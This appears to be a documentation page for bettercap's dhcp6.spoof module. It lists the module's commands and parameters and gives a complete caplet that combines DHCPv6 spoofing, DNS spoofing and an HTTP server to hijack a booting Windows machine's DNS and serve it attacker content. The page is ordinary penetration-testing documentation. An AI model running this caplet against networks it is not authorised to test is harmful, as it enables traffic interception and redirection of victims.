bettercap

mirror of https://github.com/bettercap/bettercap.git synced 2024-11-03 04:00:07 -08:00

Replies to DHCPv6 messages, providing victims with a link-local IPv6 address and setting the attacker host as default DNS server (as described here), must be used together with the dns.spoof module.

Commands

command	description
`dhcp6.spoof on`	Start the DHCPv6 spoofer in the background.
`dhcp6.spoof off`	Stop the DHCPv6 spoofer in the background.

Parameters

parameter	default	description
`dhcp6.spoof.domains`	`microsoft.com, goole.com, facebook.com, apple.com, twitter.com`	Comma separated values of domain names to spoof.

Examples

The following is the mitm6.cap caplet performing the full DHCPv6 attack versus a Windows 10 machine which is booting:

# let's spoof Microsoft and Google ^_^
set dns.spoof.domains microsoft.com, google.com
set dhcp6.spoof.domains microsoft.com, google.com

# every request http request to the spoofed hosts will come to us
# let's give em some contents
set http.server.path caplets/www

# serve files
http.server on
# redirect DNS request by spoofing DHCPv6 packets
dhcp6.spoof on
# send spoofed DNS replies ^_^
dns.spoof on

# set a custom prompt for ipv6
set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
# clear the events buffer and the screen
events.clear
clear

Known Issues
Using with Docker
Compilation
Interactive Mode and Command Line Arguments
Changing the Prompt
Caplets

Modules

Core
- events.stream
- ticker
- api.rest
- update
- caplets
HID on 2.4Ghz (mousejacking)
- hid.recon / sniff / inject
Bluetooth Low Energy
- ble.recon / enum / write
802.11
- wifi.recon / assoc / deauth / ap
Ethernet and IP
- net.recon
- net.probe
- net.sniff / net.fuzz
- syn.scan
- wake on lan
- Spoofers
- Proxies
  - any.proxy
  - packet.proxy
  - tcp.proxy
    - modules
  - http.proxy
  - https.proxy
    - modules
Servers
- http.server
- https.server
Rogue Servers
- mysql.server
Utils
- mac.changer
- gps

bettercap.org | @bettercap | team